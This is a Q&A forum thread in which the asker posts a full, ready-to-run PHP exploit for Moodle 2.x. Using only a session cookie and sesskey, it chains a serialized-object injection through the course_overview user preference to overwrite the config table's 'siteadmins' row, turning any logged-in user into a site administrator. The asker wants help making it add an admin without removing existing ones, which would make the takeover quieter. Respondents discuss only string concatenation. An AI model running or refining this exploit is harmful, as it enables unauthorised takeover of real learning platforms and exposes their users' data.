# php how to add integer to the end of the value in a column

Tags: php, mysql, sql, mariadb, sql-injection

I am testing a moodle system version 2.x.

To run the following script you need to have an account (any role) in the system. Then you replace session key, userid (both from source code after you log in) and moodlesession (from cookie). After you replace them, run the script and re log.

In this exploit php someone could sql inject a database

Is it possible to append to the end of the value in a column inside a table instead of replacing the whole value?

The value in the column has the format: 1, 2, 3 which are the userIDs
How could someone add a "," and  the new value (an integer) through that script

I tried `$value= $value .', 5' ;` as suggested by Gabri but it still replaces the whole value with a blank and `, 5`
The followng scrpipt basically makes a userid an admin but replaces any other admins.

Is it possible to not replace any other admins and just make that userid an admin too?

```
<?php
 
//defining the required classes for our exploit
namespace gradereport_singleview\local\ui {
    class feedback{   
    }
}
 
namespace {
    class gradereport_overview_external{
}
 
class grade_item{
}
 
class grade_grade{
}
 
 
// creating a simple httpPost method which requires php-curl
function httpPost($url, $data, $MoodleSession, $json)
{
    $curl = curl_init($url);
    $headers = array('Cookie: MoodleSession='.$MoodleSession);
    if($json){
        array_push($headers, 'Content-Type: application/json');
    }else{
        $data =  urldecode(http_build_query($data));
    }
    curl_setopt($curl, CURLOPT_POST, true);
    curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);
    curl_setopt($curl, CURLOPT_POSTFIELDS, $data);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    // curl_setopt($curl, CURLOPT_PROXY, '127.0.0.1:8080'); //un-comment if you wish to use a proxy
    $response = curl_exec($curl);
    curl_close($curl);
    return $response;
}
 
// creating a simple httpGet method which requires php-curl
function httpGet($url, $MoodleSession)
{
    $curl = curl_init($url);
    $headers = array('Cookie: MoodleSession='.$MoodleSession);
    curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    // curl_setopt($curl, CURLOPT_PROXY, '127.0.0.1:8080'); //un-comment if you wish to use a proxy
    $response = curl_exec($curl);
    curl_close($curl);
    return $response;
}
 
function update_table($url, $MoodleSession, $sesskey, $table, $rowId, $column, $value){
    //first we create a gradereport_overview_external object because it is supported by the Moodle autoloader and it includes the grade_grade and grade_item classes that we are going to need
    $base = new gradereport_overview_external();
 
    // now we create the feedback object which inherits the vulnerable __tostring() method from its parent
    $fb = new gradereport_singleview\local\ui\feedback();
 
    //filling the feedback object with the required properties for the exploit to work
    $fb -> grade = new grade_grade();
    $fb -> grade -> grade_item = new grade_item();
    $fb -> grade -> grade_item -> calculation = "[[somestring";
    $fb -> grade -> grade_item -> calculation_normalized = false;
 
    //setting the table which we want to alter
    $fb -> grade -> grade_item -> table = $table;
    //setting the row id of the row that we want to alter
    $fb -> grade -> grade_item -> id = $rowId;
    //setting the column with the value that we want to insert
    $fb -> grade -> grade_item -> $column = $value;
    $fb -> grade -> grade_item -> required_fields = array($column,'id');
 
    //creating the array with our base object (which itself is included in an array because the base object has no __tostring() method) and our payload object
    $arr = array(array($base),$fb);
 
    //serializing the array
    $value = serialize($arr);
 
    //we'll set the course_blocks sortorder to 0 so we default to legacy user preference
    $data = array('sesskey' => $sesskey, 'sortorder[]' => 0);
    httpPost($url. '/blocks/course_overview/save.php',$data, $MoodleSession,0);
 
    //injecting the payload
    $data = json_encode(array(array('index'=> 0, 'methodname'=>'core_user_update_user_preferences','args'=>array('preferences'=>array(array('type'=> 'course_overview_course_order', 'value' => $value))))));
    httpPost($url.'/lib/ajax/service.php?sesskey='.$sesskey, $data, $MoodleSession,1);
 
    //getting the frontpage so the payload will activate
    httpGet($url.'/my/', $MoodleSession);
    }
 
$url = ''; //url of the Moodle site
$MoodleSession = ''; //your MoodleSession cookie value
$sesskey = ''; //your sesskey
 
$table = "config"; //table to update 
$rowId = 25; // row id to insert into. 25 is the row that sets the 'siteadmins' parameter. could vary from installation to installation
$column = 'value'; //column name to update, which holds the userid
$value = 3; // userid to set as 'siteadmins' 
 
update_table($url, $MoodleSession,$sesskey,$table,$rowId,$column, $value);
 
//reset the allversionshash config entry with a sha1 hash so the site reloads its configuration
$rowId = 375; // row id of 'allversionshash' parameter
update_table($url, $MoodleSession,$sesskey,$table,$rowId, $column, sha1(time()));
 
//reset the sortorder so we can see the front page again without the payload triggering
$data = array('sesskey' => $sesskey, 'sortorder[]' => 1);
httpPost($url. '/blocks/course_overview/save.php',$data, $MoodleSession,0);
 
//force plugincheck so we can access admin panel
httpGet($url.'/admin/index.php?cache=0&confirmplugincheck=1',$MoodleSession);
 
}
?>
```

The following files are moodle assets (cant change them)

**save.php**

```
<?php
// This file is part of Moodle - http://moodle.org/
//
// Moodle is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
//
// Moodle is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with Moodle.  If not, see <http://www.gnu.org/licenses/>.

/**
 * Save course order in course_overview block
 *
 * @package    block_course_overview
 * @copyright  2012 Adam Olley <adam.olley@netspot.com.au>
 * @license    http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later
 */
define('AJAX_SCRIPT', true);

require_once(__DIR__ . '/../../config.php');
require_once(__DIR__ . '/locallib.php');

require_sesskey();
require_login();

$sortorder = required_param_array('sortorder', PARAM_INT);

block_course_overview_update_myorder($sortorder);
```

**locallib.php**

```
<?php
// This file is part of Moodle - http://moodle.org/
//
// Moodle is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
//
// Moodle is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with Moodle.  If not, see <http://www.gnu.org/licenses/>.

/**
 * Helper functions for course_overview block
 *
 * @package    block_course_overview
 * @copyright  2012 Adam Olley <adam.olley@netspot.com.au>
 * @license    http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later
 */

define('BLOCKS_COURSE_OVERVIEW_SHOWCATEGORIES_NONE', '0');
define('BLOCKS_COURSE_OVERVIEW_SHOWCATEGORIES_ONLY_PARENT_NAME', '1');
define('BLOCKS_COURSE_OVERVIEW_SHOWCATEGORIES_FULL_PATH', '2');

/**
 * Display overview for courses
 *
 * @param array $courses courses for which overview needs to be shown
 * @return array html overview
 */
function block_course_overview_get_overviews($courses) {
    $htmlarray = array();
    if ($modules = get_plugin_list_with_function('mod', 'print_overview')) {
        // Split courses list into batches with no more than MAX_MODINFO_CACHE_SIZE courses in one batch.
        // Otherwise we exceed the cache limit in get_fast_modinfo() and rebuild it too often.
        if (defined('MAX_MODINFO_CACHE_SIZE') && MAX_MODINFO_CACHE_SIZE > 0 && count($courses) > MAX_MODINFO_CACHE_SIZE) {
            $batches = array_chunk($courses, MAX_MODINFO_CACHE_SIZE, true);
        } else {
            $batches = array($courses);
        }
        foreach ($batches as $courses) {
            foreach ($modules as $fname) {
                $fname($courses, $htmlarray);
            }
        }
    }
    return $htmlarray;
}

/**
 * Sets user preference for maximum courses to be displayed in course_overview block
 *
 * @param int $number maximum courses which should be visible
 */
function block_course_overview_update_mynumber($number) {
    set_user_preference('course_overview_number_of_courses', $number);
}

/**
 * Sets user course sorting preference in course_overview block
 *
 * @param array $sortorder list of course ids
 */
function block_course_overview_update_myorder($sortorder) {
    $value = implode(',', $sortorder);
    if (core_text::strlen($value) > 1333) {
        // The value won't fit into the user preference. Remove courses in the end of the list (mostly likely user won't even notice).
        $value = preg_replace('/,[\d]*$/', '', core_text::substr($value, 0, 1334));
    }
    set_user_preference('course_overview_course_sortorder', $value);
}

/**
 * Gets user course sorting preference in course_overview block
 *
 * @return array list of course ids
 */
function block_course_overview_get_myorder() {
    if ($value = get_user_preferences('course_overview_course_sortorder')) {
        return explode(',', $value);
    }
    // If preference was not found, look in the old location and convert if found.
    $order = array();
    if ($value = get_user_preferences('course_overview_course_order')) {
        $order = unserialize($value);
        block_course_overview_update_myorder($order);
        unset_user_preference('course_overview_course_order');
    }
    return $order;
}

/**
 * Returns shortname of activities in course
 *
 * @param int $courseid id of course for which activity shortname is needed
 * @return string|bool list of child shortname
 */
function block_course_overview_get_child_shortnames($courseid) {
    global $DB;
    $ctxselect = context_helper::get_preload_record_columns_sql('ctx');
    $sql = "SELECT c.id, c.shortname, $ctxselect
            FROM {enrol} e
            JOIN {course} c ON (c.id = e.customint1)
            JOIN {context} ctx ON (ctx.instanceid = e.customint1)
            WHERE e.courseid = :courseid AND e.enrol = :method AND ctx.contextlevel = :contextlevel ORDER BY e.sortorder";
    $params = array('method' => 'meta', 'courseid' => $courseid, 'contextlevel' => CONTEXT_COURSE);

    if ($results = $DB->get_records_sql($sql, $params)) {
        $shortnames = array();
        // Preload the context we will need it to format the category name shortly.
        foreach ($results as $res) {
            context_helper::preload_from_record($res);
            $context = context_course::instance($res->id);
            $shortnames[] = format_string($res->shortname, true, $context);
        }
        $total = count($shortnames);
        $suffix = '';
        if ($total > 10) {
            $shortnames = array_slice($shortnames, 0, 10);
            $diff = $total - count($shortnames);
            if ($diff > 1) {
                $suffix = get_string('shortnamesufixprural', 'block_course_overview', $diff);
            } else {
                $suffix = get_string('shortnamesufixsingular', 'block_course_overview', $diff);
            }
        }
        $shortnames = get_string('shortnameprefix', 'block_course_overview', implode('; ', $shortnames));
        $shortnames .= $suffix;
    }

    return isset($shortnames) ? $shortnames : false;
}

/**
 * Returns maximum number of courses which will be displayed in course_overview block
 *
 * @param bool $showallcourses if set true all courses will be visible.
 * @return int maximum number of courses
 */
function block_course_overview_get_max_user_courses($showallcourses = false) {
    // Get block configuration
    $config = get_config('block_course_overview');
    $limit = $config->defaultmaxcourses;

    // If max course is not set then try get user preference
    if (empty($config->forcedefaultmaxcourses)) {
        if ($showallcourses) {
            $limit = 0;
        } else {
            $limit = get_user_preferences('course_overview_number_of_courses', $limit);
        }
    }
    return $limit;
}

/**
 * Return sorted list of user courses
 *
 * @param bool $showallcourses if set true all courses will be visible.
 * @return array list of sorted courses and count of courses.
 */
function block_course_overview_get_sorted_courses($showallcourses = false) {
    global $USER;

    $limit = block_course_overview_get_max_user_courses($showallcourses);

    $courses = enrol_get_my_courses();
    $site = get_site();

    if (array_key_exists($site->id,$courses)) {
        unset($courses[$site->id]);
    }

    foreach ($courses as $c) {
        if (isset($USER->lastcourseaccess[$c->id])) {
            $courses[$c->id]->lastaccess = $USER->lastcourseaccess[$c->id];
        } else {
            $courses[$c->id]->lastaccess = 0;
        }
    }

    // Get remote courses.
    $remotecourses = array();
    if (is_enabled_auth('mnet')) {
        $remotecourses = get_my_remotecourses();
    }
    // Remote courses will have -ve remoteid as key, so it can be differentiated from normal courses
    foreach ($remotecourses as $id => $val) {
        $remoteid = $val->remoteid * -1;
        $val->id = $remoteid;
        $courses[$remoteid] = $val;
    }

    $order = block_course_overview_get_myorder();

    $sortedcourses = array();
    $counter = 0;
    // Get courses in sort order into list.
    foreach ($order as $key => $cid) {
        if (($counter >= $limit) && ($limit != 0)) {
            break;
        }

        // Make sure user is still enroled.
        if (isset($courses[$cid])) {
            $sortedcourses[$cid] = $courses[$cid];
            $counter++;
        }
    }
    // Append unsorted courses if limit allows
    foreach ($courses as $c) {
        if (($limit != 0) && ($counter >= $limit)) {
            break;
        }
        if (!in_array($c->id, $order)) {
            $sortedcourses[$c->id] = $c;
            $counter++;
        }
    }

    // From list extract site courses for overview
    $sitecourses = array();
    foreach ($sortedcourses as $key => $course) {
        if ($course->id > 0) {
            $sitecourses[$key] = $course;
        }
    }
    return array($sortedcourses, $sitecourses, count($courses));
}
```

**block_course_overview.php**

```
<?php
// This file is part of Moodle - http://moodle.org/
//
// Moodle is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
//
// Moodle is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with Moodle.  If not, see <http://www.gnu.org/licenses/>.

/**
 * Course overview block
 *
 * @package    block_course_overview
 * @copyright  1999 onwards Martin Dougiamas (http://dougiamas.com)
 * @license    http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later
 */
require_once($CFG->dirroot.'/blocks/course_overview/locallib.php');

/**
 * Course overview block
 *
 * @copyright  1999 onwards Martin Dougiamas (http://dougiamas.com)
 * @license    http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later
 */
class block_course_overview extends block_base {
    /**
     * If this is passed as mynumber then showallcourses, irrespective of limit by user.
     */
    const SHOW_ALL_COURSES = -2;

    /**
     * Block initialization
     */
    public function init() {
        $this->title   = get_string('pluginname', 'block_course_overview');
    }

    /**
     * Return contents of course_overview block
     *
     * @return stdClass contents of block
     */
    public function get_content() {
        global $USER, $CFG, $DB;
        require_once($CFG->dirroot.'/user/profile/lib.php');

        if($this->content !== NULL) {
            return $this->content;
        }

        $config = get_config('block_course_overview');

        $this->content = new stdClass();
        $this->content->text = '';
        $this->content->footer = '';

        $content = array();

        $updatemynumber = optional_param('mynumber', -1, PARAM_INT);
        if ($updatemynumber >= 0) {
            block_course_overview_update_mynumber($updatemynumber);
        }

        profile_load_custom_fields($USER);

        $showallcourses = ($updatemynumber === self::SHOW_ALL_COURSES);
        list($sortedcourses, $sitecourses, $totalcourses) = block_course_overview_get_sorted_courses($showallcourses);
        $overviews = block_course_overview_get_overviews($sitecourses);

        $renderer = $this->page->get_renderer('block_course_overview');
        if (!empty($config->showwelcomearea)) {
            require_once($CFG->dirroot.'/message/lib.php');
            $msgcount = message_count_unread_messages();
            $this->content->text = $renderer->welcome_area($msgcount);
        }

        // Number of sites to display.
        if ($this->page->user_is_editing() && empty($config->forcedefaultmaxcourses)) {
            $this->content->text .= $renderer->editing_bar_head($totalcourses);
        }

        if (empty($sortedcourses)) {
            $this->content->text .= get_string('nocourses','my');
        } else {
            // For each course, build category cache.
            $this->content->text .= $renderer->course_overview($sortedcourses, $overviews);
            $this->content->text .= $renderer->hidden_courses($totalcourses - count($sortedcourses));
        }

        return $this->content;
    }

    /**
     * Allow the block to have a configuration page
     *
     * @return boolean
     */
    public function has_config() {
        return true;
    }

    /**
     * Locations where block can be displayed
     *
     * @return array
     */
    public function applicable_formats() {
        return array('my' => true);
    }

    /**
     * Sets block header to be hidden or visible
     *
     * @return bool if true then header will be visible.
     */
    public function hide_header() {
        // Hide header if welcome area is show.
        $config = get_config('block_course_overview');
        return !empty($config->showwelcomearea);
    }
}
```

Comment: `doesn't work`...means what? What does it do instead? Also we can't even see how you actually construct or execute the final query so it's all a bit unclear. `I tried $value= $value +', 5' ;`...where exactly did you try this? And besides, hard-coding a value into the PHP code isn't really sql injection - injection attempts come from user input.

Comment: `The value in the column has the format: 1, 2, 3`...an an aside, this is usually a symptom of a design flaw where the database designer had not properly understood the principles of relational database design, and how to use foreign keys. Such comma-separated data in a single field is regarded as being de-normalised. This results it in being hard to sort, filter, extract, partially-update or otherwise manipulate such data using SQL.

Comment: @ADyson i know but the system is already built. it throws an error while executing php PHP Notice:  Undefined variable

Comment: Please edit the question to show a) where exactly you used this code, b) enough of the rest of your code to make a [mre] of the problem, c) the full error message, not just part of it.

Comment: @ADyson here https://pastebin.com/VmjQNGGM

Comment: No, as I said, please **edit the question**. The "edit" button is just under the question itself, near the little blue php tag. Questions which don't include all the relevant info _within the question_ are eligible to be closed as [off-topic](https://stackoverflow.com/help/on-topic). And when you edit your question, please include all 3 things I asked for. Again, please see how to create a [mre] for more guidance. See also the [tour] and [ask] which (from looking at the lack of badge in your profile) it appears you didn't read, despite being recommended to when you create your account. Thanks.

Comment: Thanks again, but...please include all 3 things I asked for, not just one.

Comment: Also this code appears to then call another PHP script via CURL. So without the relevant bits of that other script, we still cannot actually see how it writes to the database and whether SQL injection would be possible.

Comment: @ADyson Hi. I am not sure which is the other script. its probably one that is with the moodle system. This one is the only one that someone needs to change permissions to admin

Comment: The "other script" is the one named `save.php` which is being called by your curl request - I assume that's the one which actually attempts to save the data into the database.

Answer (score 1):

You can't use the "+" to concatenate in php, you need to use a dot.

For example:

```
echo "Hello" + "World";  //Won't work
echo "Hello" . "World"; //Correct approach
```

Perhaps this may work, but it's hard to say without seeing the full issue in perspective.

```
$value= $value .', 5';
```

Comment: $value ="$value" . ", 5"; 
this will work?

Comment: It will concatenate the value, but i don't know if it will work as an sql injection.

Comment: here is the full script https://pastebin.com/VmjQNGGM

Comment: i checked the database but it replaced with the value ", 5"